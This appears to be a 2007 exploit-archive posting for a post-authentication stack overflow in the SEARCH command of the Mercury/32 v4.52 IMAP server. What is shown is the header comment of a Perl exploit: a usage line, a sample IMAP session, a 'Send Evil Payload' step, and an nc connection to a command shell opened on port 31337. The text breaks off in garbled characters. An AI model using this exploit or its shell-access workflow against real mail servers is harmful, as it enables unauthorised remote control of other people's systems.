Home / exploits mercury-overflow.txt
Posted on 20 September 2007
# Z:Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org # Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit # Found & Code by void# ph4nt0m.org # # S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. # C: pst06 LOGIN void ph4nt0m.org # S: pst06 OK LOGIN completed. # C: pst06 SELECT INBOX # S: * 0 EXISTS # S: * 0 RECENT # S: * FLAGS (Deleted Draft Seen Answered) # S: * OK [UIDVALIDITY 1190225819] UID Validity # S: * OK [UIDNEXT 1] Predicted next UID # S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flag # s # S: pst06 OK [READ-WRITE] SELECT completed. # [*] Send Evil Payload ... # [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P # # Z:Exp>nc -vv 127.0.0.1 31337 # DNS fwd/rev mismatch: localhost != GNU # localhost [127.0.0.1] 31337 (?) open # Microsoft Windows XP [°æ±¾ 5.1.2600] # (C) °æÃ